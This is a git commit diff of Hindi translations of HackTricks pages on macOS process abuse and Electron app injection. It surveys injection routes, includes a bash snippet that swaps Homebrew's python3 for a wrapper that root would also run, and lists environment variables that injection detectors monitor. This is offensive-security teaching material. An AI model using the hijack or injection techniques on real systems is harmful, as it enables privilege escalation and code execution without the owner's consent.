Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

2024-11-15 17:28:13 +00:00 · 2024-01-04 11:58:21 +00:00 · 2024-01-04 11:58:21 +00:00 · 6949399633
commit 6949399633
parent b77b59212e
17 changed files with 929 additions and 733 deletions
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
@ -1,24 +1,26 @@
-# macOS प्रक्रिया दुरुपयोग
+# macOS प्रोसेस दुरुपयोग

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह खोजें
-* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें**.
-* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके अपने हैकिंग ट्रिक्स साझा करें।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
+* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

 </details>

-## MacOS प्रक्रिया दुरुपयोग
+## MacOS प्रोसेस दुरुपयोग

-MacOS, किसी भी अन्य ऑपरेटिंग सिस्टम की तरह, **प्रक्रियाओं को इंटरैक्ट, संचार और डेटा साझा करने** के लिए विभिन्न तकनीकों और यंत्रों की प्रदान करता है। ये तकनीक दक्ष प्रणाली के सही कार्य के लिए आवश्यक होती हैं, लेकिन इनका दुरुपयोग भी खतरनाक गतिविधियों को करने के लिए थ्रेट एक्टर्स द्वारा किया जा सकता है।
+MacOS, अन्य ऑपरेटिंग सिस्टम की तरह, **प्रोसेस के बीच इंटरैक्ट, कम्युनिकेट और डेटा शेयर करने** के लिए विभिन्न तरीके और तंत्र प्रदान करता है। जबकि ये तकनीकें सिस्टम के कुशल कार्यान्वयन के लिए आवश्यक हैं, इनका दुरुपयोग खतरा पैदा करने वाले लोग **दुर्भावनापूर्ण गतिविधियां करने** के लिए भी कर सकते हैं।

 ### लाइब्रेरी इंजेक्शन

-लाइब्रेरी इंजेक्शन एक तकनीक है जिसमें एक हमलावर्धक **प्रक्रिया को एक खतरनाक लाइब्रेरी लोड करने के लिए मजबूर किया जाता है**। इंजेक्शन के बाद, लाइब्रेरी लक्ष्य प्रक्रिया के संदर्भ में चलती है, हमलावर्धक को प्रक्रिया के साथ एक ही अनुमतियों और पहुंच की प्रदान करती है।
+लाइब्रेरी इंजेक्शन एक तकनीक है जिसमें हमलावर **एक प्रोसेस को दुर्भावनापूर्ण लाइब्रेरी लोड करने के लिए मजबूर करता है**। एक बार इंजेक्ट होने के बाद, लाइब्रेरी लक्षित प्रोसेस के संदर्भ में चलती है, जिससे हमलावर को प्रोसेस के समान अनुमतियां और पहुंच मिल जाती है।

 {% content-ref url="macos-library-injection/" %}
 [macos-library-injection](macos-library-injection/)
@ -26,31 +28,72 @@ MacOS, किसी भी अन्य ऑपरेटिंग सिस्ट

 ### फंक्शन हुकिंग

-फंक्शन हुकिंग में, सॉफ्टवेयर कोड के भीतर **फंक्शन कॉल** या **संदेशों को अवरोधित करना** शामिल होता है। फंक्शन हुकिंग के द्वारा, एक हमलावर्धक प्रक्रिया का व्यवहार **संशोधित** कर सकता है, संवेदनशील डेटा का अवलोकन कर सकता है, या नियंत्रण प्राप्त कर सकता है।
+फंक्शन हुकिंग में **फंक्शन कॉल्स या संदेशों को इंटरसेप्ट करना** शामिल है। फंक्शन्स को हुक करके, हमलावर प्रोसेस के व्यवहार को **मोडिफाई कर सकता है**, संवेदनशील डेटा को देख सकता है, या यहां तक कि निष्पादन प्रवाह पर नियंत्रण प्राप्त कर सकता है।

 {% content-ref url="../mac-os-architecture/macos-function-hooking.md" %}
 [macos-function-hooking.md](../mac-os-architecture/macos-function-hooking.md)
 {% endcontent-ref %}

-### इंटर प्रक्रिया संचार
+### इंटर प्रोसेस कम्युनिकेशन

-इंटर प्रक्रिया संचार (IPC) अलग-अलग तकनीकों को संदर्भित करता है जिनसे अलग-अलग प्रक्रियाएं **डेटा साझा और आपस में विनिमय करती हैं**। IPC बहुत सारे वैधानिक अनुप्रयोगों के लिए मूल्यांकन है, लेकिन इसका दुरुपयोग प्रक्रिया अलगाव को अवरुद्ध करने, संवेदनशील जानकारी लीक करने या अनधिकृत कार्रवाई करने के लिए किया जा सकता है।
+इंटर प्रोसेस कम्युनिकेशन (IPC) विभिन्न तरीकों को संदर्भित करता है जिसके द्वारा अलग-अलग प्रोसेस **डेटा शेयर और एक्सचेंज करते हैं**। जबकि IPC कई वैध अनुप्रयोगों के लिए मौलिक है, इसका दुरुपयोग प्रोसेस आइसोलेशन को उलटने, संवेदनशील जानकारी को लीक करने, या अनधिकृत क्रियाएं करने के लिए भी किया जा सकता है।

 {% content-ref url="../mac-os-architecture/macos-ipc-inter-process-communication/" %}
 [macos-ipc-inter-process-communication](../mac-os-architecture/macos-ipc-inter-process-communication/)
 {% endcontent-ref %}

-### इलेक्ट्रॉन एप्लिकेशन इंजेक्शन
+### इलेक्ट्रॉन एप्लिकेशन्स इंजेक्शन

-निश्चित env variables के साथ निष्पादित इलेक्ट्रॉन एप्लिकेशन प्रक्रिया इंजेक्शन के लिए संकटग्रस्त हो सकते हैं:
+विशिष्ट env वेरिएबल्स के साथ निष्पादित इलेक्ट्रॉन एप्लिकेशन्स प्रोसेस इंजेक्शन के लिए संवेदनशील हो सकते हैं:

 {% content-ref url="macos-electron-applications-injection.md" %}
 [macos-electron-applications-injection.md](macos-electron-applications-injection.md)
 {% endcontent-ref %}

-### गंदी NIB
+### डर्टी NIB

-NIB फ़ाइलें **उपयोगकर्ता इंटरफ़ेस (UI) तत्वों** को परिभाषित करती हैं और एक एप्लिकेशन के भीतर उनके संवेदनशीलता के साथ इंटरैक्शन करती हैं। हालांकि, वे **अनियंत्रित आदेशों को निष्पादित कर सकते
+NIB फाइलें **यूजर इंटरफेस (UI) तत्वों** और एक एप्लिकेशन के भीतर उनके इंटरैक्शन को परिभाषित करती हैं। हालांकि, वे **मनमाने कमांड्स को निष्पादित कर सकती हैं** और **Gatekeeper एक बार निष्पादित हो चुके एप्लिकेशन को रोक नहीं पाता** अगर **NIB फाइल को संशोधित किया गया हो**। इसलिए, वे मनमाने प्रोग्राम्स को मनमाने कमांड्स निष्पादित करने के लिए उपयोग की जा सकती हैं:
+
+{% content-ref url="macos-dirty-nib.md" %}
+[macos-dirty-nib.md](macos-dirty-nib.md)
+{% endcontent-ref %}
+
+### जावा एप्लिकेशन्स इंजेक्शन
+
+कुछ जावा क्षमताओं (जैसे कि **`_JAVA_OPTS`** env वेरिएबल) का दुरुपयोग करके एक जावा एप्लिकेशन को **मनमाने कोड/कमांड्स निष्पादित करने** के लिए बनाया जा सकता है।
+
+{% content-ref url="macos-java-apps-injection.md" %}
+[macos-java-apps-injection.md](macos-java-apps-injection.md)
+{% endcontent-ref %}
+
+### .Net एप्लिकेशन्स इंजेक्शन
+
+.Net एप्लिकेशन्स में कोड इंजेक्ट करना संभव है **.Net डिबगिंग फंक्शनलिटी का दुरुपयोग करके** (macOS सुरक्षा जैसे रनटाइम हार्डनिंग द्वारा संरक्षित नहीं)।
+
+{% content-ref url="macos-.net-applications-injection.md" %}
+[macos-.net-applications-injection.md](macos-.net-applications-injection.md)
+{% endcontent-ref %}
+
+### पर्ल इंजेक्शन
+
+एक पर्ल स्क्रिप्ट को मनमाने कोड निष्पादित करने के विभिन्न विकल्पों की जांच करें:
+
+{% content-ref url="macos-perl-applications-injection.md" %}
+[macos-perl-applications-injection.md](macos-perl-applications-injection.md)
+{% endcontent-ref %}
+
+### पायथन इंजेक्शन
+
+यदि पर्यावरण वेरिएबल **`PYTHONINSPECT`** सेट है, तो पायथन प्रोसेस एक बार समाप्त होने के बाद पायथन cli में ड्रॉप हो जाएगा। **`PYTHONSTARTUP`** का उपयोग एक पायथन स्क्रिप्ट को इंटरैक्टिव सत्र की शुरुआत में निष्पादित करने के लिए भी किया जा सकता है।\
+हालांकि, ध्यान दें कि **`PYTHONSTARTUP`** स्क्रिप्ट **`PYTHONINSPECT`** द्वारा बनाए गए इंटरैक्टिव सत्र में निष्पादित नहीं होगी।
+
+अन्य env वेरिएबल्स जैसे कि **`PYTHONPATH`** और **`PYTHONHOME`** भी पायथन कमांड को मनमाने कोड निष्पादित करने के लिए उपयोगी हो सकते हैं।
+
+ध्यान दें कि **`pyinstaller`** के साथ संकलित एक्जीक्यूटेबल्स इन पर्यावरण वेरिएबल्स का उपयोग नहीं करेंगे भले ही वे एम्बेडेड पायथन का उपयोग कर रहे हों।
+
+{% hint style="danger" %}
+कुल मिलाकर मैं पायथन को पर्यावरण वेरिएबल्स का दुरुपयोग करके मनमाने कोड निष्पादित करने का कोई तरीका नहीं ढूंढ पाया।\
+हालांकि, अधिकांश लोग **Hombrew** का उपयोग करके पायथन को इंस्टॉल करते हैं, जो पायथन को डिफॉल्ट एडमिन यूजर के लिए एक **लिखने योग्य स्थान** पर इंस्टॉल करेगा। आप इसे कुछ इस तरह से हाइजैक कर सकते हैं:
 ```bash
 mv /opt/homebrew/bin/python3 /opt/homebrew/bin/python3.old
 cat > /opt/homebrew/bin/python3 <<EOF
@ -60,25 +103,26 @@ cat > /opt/homebrew/bin/python3 <<EOF
 EOF
 chmod +x /opt/homebrew/bin/python3
 ```
-यह कोड चलाने पर **रूट** भी इस कोड को चलाएगा।
+```markdown
+यहां तक कि **root** भी इस कोड को चलाएगा जब python चल रहा हो।
 {% endhint %}

 ## पता लगाना

 ### Shield

-[**Shield**](https://theevilbit.github.io/shield/) ([**Github**](https://github.com/theevilbit/Shield)) एक ओपन सोर्स एप्लिकेशन है जो **प्रक्रिया इंजेक्शन की पहचान और रोकथाम** कर सकता है:
+[**Shield**](https://theevilbit.github.io/shield/) ([**Github**](https://github.com/theevilbit/Shield)) एक ओपन सोर्स एप्लिकेशन है जो **प्रोसेस इंजेक्शन** क्रियाओं का पता लगा सकता है और उन्हें ब्लॉक कर सकता है:

-* **पर्यावरणीय चरों** का उपयोग करके: यह निम्नलिखित पर्यावरणीय चरों **`DYLD_INSERT_LIBRARIES`**, **`CFNETWORK_LIBRARY_PATH`**, **`RAWCAMERA_BUNDLE_PATH`** और **`ELECTRON_RUN_AS_NODE`** की मौजूदगी का मॉनिटरिंग करेगा।
-* **`task_for_pid`** कॉल का उपयोग करके: जब एक प्रक्रिया दूसरी प्रक्रिया में कोड इंजेक्शन करने की इच्छा रखती है, तो यह उस दूसरी प्रक्रिया के टास्क पोर्ट प्राप्त करने की पहचान करेगा।
-* **Electron ऐप्स पैरामीटर**: कोई व्यक्ति इलेक्ट्रॉन ऐप को डिबगिंग मोड में शुरू करने के लिए **`--inspect`**, **`--inspect-brk`** और **`--remote-debugging-port`** कमांड लाइन तर्क का उपयोग कर सकता है, और इसलिए इसमें कोड इंजेक्शन कर सकता है।
-* **सिमलिंक्स** या **हार्डलिंक्स** का उपयोग करके: सामान्यतः सबसे सामान्य दुरुपयोग यह है कि हम **अपने उपयोगकर्ता विशेषाधिकारों** के साथ एक लिंक रखते हैं, और उच्चतर विशेषाधिकार स्थान की ओर इसे पॉइंट करते हैं। हार्डलिंक और सिमलिंक्स के लिए पहचानना बहुत सरल है। यदि लिंक बनाने वाली प्रक्रिया का **विशेषाधिकार स्तर** लक्ष्य फ़ाइल से अलग होता है, तो हम एक **चेतावनी** बनाते हैं। दुर्भाग्य से सिमलिंक्स ब्लॉक करना संभव नहीं है, क्योंकि हमें लिंक के गंतव्य के बारे में जानकारी पहले से ही नहीं होती है। यह Apple के EndpointSecuriy framework की एक सीमा है।
+* **Environmental Variables** का उपयोग करके: यह निम्नलिखित पर्यावरणीय चरों की उपस्थिति की निगरानी करेगा: **`DYLD_INSERT_LIBRARIES`**, **`CFNETWORK_LIBRARY_PATH`**, **`RAWCAMERA_BUNDLE_PATH`** और **`ELECTRON_RUN_AS_NODE`**
+* **`task_for_pid`** कॉल्स का उपयोग करके: जब एक प्रोसेस दूसरे के **task port** को प्राप्त करना चाहता है जिससे वह प्रोसेस में कोड इंजेक्ट कर सके।
+* **Electron apps params**: कोई भी **`--inspect`**, **`--inspect-brk`** और **`--remote-debugging-port`** कमांड लाइन आर्ग्युमेंट का उपयोग करके एक Electron एप्प को डिबगिंग मोड में शुरू कर सकता है, और इस तरह उसमें कोड इंजेक्ट कर सकता है।
+* **symlinks** या **hardlinks** का उपयोग करके: आमतौर पर सबसे आम दुरुपयोग यह है कि **हमारे उपयोगकर्ता विशेषाधिकारों के साथ एक लिंक रखें**, और उसे उच्च विशेषाधिकार स्थान की ओर इंगित करें। हार्डलिंक और सिम्लिंक्स दोनों के लिए पता लगाना बहुत सरल है। यदि लिंक बनाने वाले प्रोसेस का **विशेषाधिकार स्तर** लक्ष्य फ़ाइल से **अलग** है, तो हम एक **अलर्ट** बनाते हैं। दुर्भाग्यवश सिम्लिंक्स के मामले में ब्लॉकिंग संभव नहीं है, क्योंकि हमें लिंक के गंतव्य के बारे में जानकारी नहीं होती है निर्माण से पहले। यह Apple के EndpointSecuriy फ्रेमवर्क की एक सीमा है।

-### अन्य प्रक्रियाओं द्वारा किए गए कॉल
+### अन्य प्रोसेस द्वारा किए गए कॉल्स

-[**इस ब्लॉग पोस्ट**](https://knight.sc/reverse%20engineering/2019/04/15/detecting-task-modifications.html) में आप देख सकते हैं कि कैसे फ़ंक्शन **`task_name_for_pid`** का उपयोग करके एक प्रक्रिया में कोड इंजेक्शन करने वाली अन्य **प्रक्रियाओं के बारे में जानकारी प्राप्त** की जा सकती है और फिर उस अन्य प्रक्रिया के बारे में जानकारी प्राप्त की जा सकती है।
+[**इस ब्लॉग पोस्ट**](https://knight.sc/reverse%20engineering/2019/04/15/detecting-task-modifications.html) में आप पा सकते हैं कि कैसे **`task_name_for_pid`** फंक्शन का उपयोग करके अन्य **प्रोसेस द्वारा किसी प्रोसेस में कोड इंजेक्ट करने** के बारे में जानकारी प्राप्त की जा सकती है और फिर उस अन्य प्रोसेस के बारे में जानकारी प्राप्त की जा सकती है।

-ध्यान दें कि उस फ़ंक्शन को कॉल करने के लिए आपको प्रक्रिया चलाने वाले व्यक्ति के **एक ही uid** होना चाहिए या **रूट** होना चाहिए (और यह कोड इंजेक्शन का एक तरीका नहीं है, बल्कि इससे प्रक्रिया के बारे में जानकारी प्राप्त होती है)।
+ध्यान दें कि उस फंक्शन को कॉल करने के लिए आपको **उसी uid** होना चाहिए जो प्रोसेस चला रहा है या **root** (और यह प्रोसेस के बारे में जानकारी लौटाता है, कोड इंजेक्ट करने का तरीका नहीं)।

 ## संदर्भ

@ -87,12 +131,15 @@ chmod +x /opt/homebrew/bin/python3

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं** या HackTricks को **PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
-* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* **[💬](https://emojipedia.org/speech-balloon/) Discord समूह** या **[telegram समूह](https://t.me/peass)** में शामिल हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
+* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का अनुसरण करें।**
+* **HackTricks** के लिए PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

 </details>
+```
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
@ -1,39 +1,41 @@
-# macOS इलेक्ट्रॉन एप्लिकेशन इंजेक्शन
+# macOS Electron एप्लिकेशन्स इंजेक्शन

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
+<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह।
-* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का** **अनुसरण** करें।**
-* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके** **शेयर करें।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का पालन करें.**
+* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.

 </details>

-## मूलभूत जानकारी
+## मूल जानकारी

-यदि आपको पता नहीं है कि इलेक्ट्रॉन क्या है, तो आप [**यहां बहुत सारी जानकारी पा सकते हैं**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps)। लेकिन अब तक यह जान लें कि इलेक्ट्रॉन **नोड** चलाता है।\
-और नोड के पास कुछ **पैरामीटर** और **एनवायरनमेंट वेरिएबल्स** होते हैं जिनका उपयोग **निर्दिष्ट फ़ाइल** के अलावा **अन्य कोड को निष्पादित करने** के लिए किया जा सकता है।
+यदि आपको नहीं पता कि Electron क्या है, तो आप [**यहाँ बहुत सारी जानकारी पा सकते हैं**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps). लेकिन अभी के लिए बस जान लें कि Electron **node** चलाता है.\
+और node में कुछ **पैरामीटर्स** और **env वेरिएबल्स** होते हैं जिनका उपयोग करके **अन्य कोड को निष्पादित करने** के लिए किया जा सकता है, निर्दिष्ट फाइल के अलावा.

-### इलेक्ट्रॉन फ्यूज़
+### Electron Fuses

-इन तकनीकों पर चर्चा अगले में की जाएगी, लेकिन हाल के समय में इलेक्ट्रॉन ने इन्हें रोकने के लिए कई **सुरक्षा ध्वज** जोड़े हैं। ये हैं [**इलेक्ट्रॉन फ्यूज़**](https://www.electronjs.org/docs/latest/tutorial/fuses) और ये वे हैं जो मैकओएस में इलेक्ट्रॉन ऐप्स को **अनियमित कोड लोड** से **रोकने** का उपयोग करते हैं:
+ये तकनीकें आगे चर्चा की जाएंगी, लेकिन हाल के समय में Electron ने कई **सुरक्षा झंडे जोड़े हैं उन्हें रोकने के लिए**. ये हैं [**Electron Fuses**](https://www.electronjs.org/docs/latest/tutorial/fuses) और ये वे हैं जो macOS में Electron एप्लिकेशन्स को **मनमाने कोड लोड करने से रोकते हैं**:

-* **`RunAsNode`**: यदि यह अक्षम है, तो यह एनवायरनमेंट वेरिएबल **`ELECTRON_RUN_AS_NODE`** का उपयोग कोड इंजेक्शन करने के लिए रोकता है।
-* **`EnableNodeCliInspectArguments`**: यदि यह अक्षम है, तो `--inspect`, `--inspect-brk` जैसे पैरामीटरों का उपयोग नहीं होगा। इस तरह कोड इंजेक्शन को रोकता है।
-* **`EnableEmbeddedAsarIntegrityValidation`**: यदि यह सक्षम है, तो मैकओएस द्वारा लोड किए गए **`asar`** **फ़ाइल** की **मान्यता** की जाएगी। इस तरह कोड इंजेक्शन को रोकता है जब इस फ़ाइल की सामग्री को संशोधित किया जाता है।
-* **`OnlyLoadAppFromAsar`**: यदि यह सक्षम है, तो निम्न क्रम में लोड करने के लिए खोजने की बजाय: **`app.asar`**, **`app`** और अंत में **`default_app.asar`**। यह केवल app.asar की जांच करेगा और उपयोग करेगा, इसलिए यह सुनिश्चित करता है कि **`embeddedAsarIntegrityValidation`** फ्यूज़ के साथ मिलाकर गैर-मान्यता प्राप्त कोड लोड करना **असंभव** है।
-* **`LoadBrowserProcessSpecificV8Snapshot`**: यदि यह सक्षम है, तो ब्राउज़र प्रोसेस अपने V8 स्नैपशॉट के लिए `browser_v8_context_snapshot.bin` नामक फ़ाइल का उपयोग करता है।
+* **`RunAsNode`**: यदि निष्क्रिय किया गया है, तो यह env var **`ELECTRON_RUN_AS_NODE`** का उपयोग करके कोड इंजेक्ट करने से रोकता है.
+* **`EnableNodeCliInspectArguments`**: यदि निष्क्रिय किया गया है, तो पैरामीटर्स जैसे कि `--inspect`, `--inspect-brk` का सम्मान नहीं किया जाएगा. इस तरह से कोड इंजेक्ट करने से बचते हैं.
+* **`EnableEmbeddedAsarIntegrityValidation`**: यदि सक्षम किया गया है, तो लोड की गई **`asar`** **फाइल** को macOS द्वारा **मान्य** किया जाएगा. इस तरह से इस फाइल की सामग्री को संशोधित करके **कोड इंजेक्शन** को **रोकता** है.
+* **`OnlyLoadAppFromAsar`**: यदि यह सक्षम है, तो इसके बजाय कि निम्नलिखित क्रम में लोड करने की खोज की जाए: **`app.asar`**, **`app`** और अंत में **`default_app.asar`**. यह केवल app.asar की जांच करेगा और उपयोग करेगा, इस प्रकार यह सुनिश्चित करता है कि जब **`embeddedAsarIntegrityValidation`** फ्यूज के साथ **संयुक्त** होता है तो यह **असंभव** है कि **मान्य नहीं किए गए कोड को लोड करें**.
+* **`LoadBrowserProcessSpecificV8Snapshot`**: यदि सक्षम है, तो ब्राउज़र प्रक्रिया अपने V8 स्नैपशॉट के लिए `browser_v8_context_snapshot.bin` नामक फाइल का उपयोग करती है.

-एक और दिलचस्प फ्यूज़ जो कोड इंजेक्शन को रोकने वाला नहीं होगा है:
+एक और दिलचस्प फ्यूज जो कोड इंजेक्शन को रोक नहीं रहा है:

-* **EnableCookieEncryption**: यदि यह सक्षम है, तो डिस्क पर कुकी स्टोर को ओएस स्तरीय गणना कुंजी का उपयोग करके एन्क्रिप्ट किया जाता है।
+* **EnableCookieEncryption**: यदि सक्षम है, तो डिस्क पर कुकी स्टोर OS स्तर की क्रिप्टोग्राफी कुंजियों का उपयोग करके एन्क्रिप्टेड होता है.

-### इलेक्ट्रॉन फ्यूज़ की जांच करना
+### Electron Fuses की जांच करना

-आप एक एप्लिकेशन से **इन ध्वजों की जांच** कर सकते हैं:
+आप एक एप्लिकेशन से इन झंडों की **जांच कर सकते हैं** :
 ```bash
 npx @electron/fuses read --app /Applications/Slack.app

@ -47,37 +49,37 @@ EnableEmbeddedAsarIntegrityValidation is Enabled
 OnlyLoadAppFromAsar is Enabled
 LoadBrowserProcessSpecificV8Snapshot is Disabled
 ```
-### Electron फ्यूज़ को संशोधित करना
+### इलेक्ट्रॉन फ्यूज़ को संशोधित करना

-जैसा कि [**दस्तावेज़**](https://www.electronjs.org/docs/latest/tutorial/fuses#runasnode) में उल्लेख किया गया है, **Electron फ्यूज़** के विन्यास को **Electron बाइनरी** में कॉन्फ़िगर किया जाता है जिसमें कहीं न कहीं तार **`dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX`** होता है।
+जैसा कि [**डॉक्स में उल्लेख है**](https://www.electronjs.org/docs/latest/tutorial/fuses#runasnode), **इलेक्ट्रॉन फ्यूज़** की कॉन्फ़िगरेशन **इलेक्ट्रॉन बाइनरी** के अंदर कॉन्फ़िगर की जाती है जिसमें कहीं न कहीं स्ट्रिंग **`dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX`** होती है।

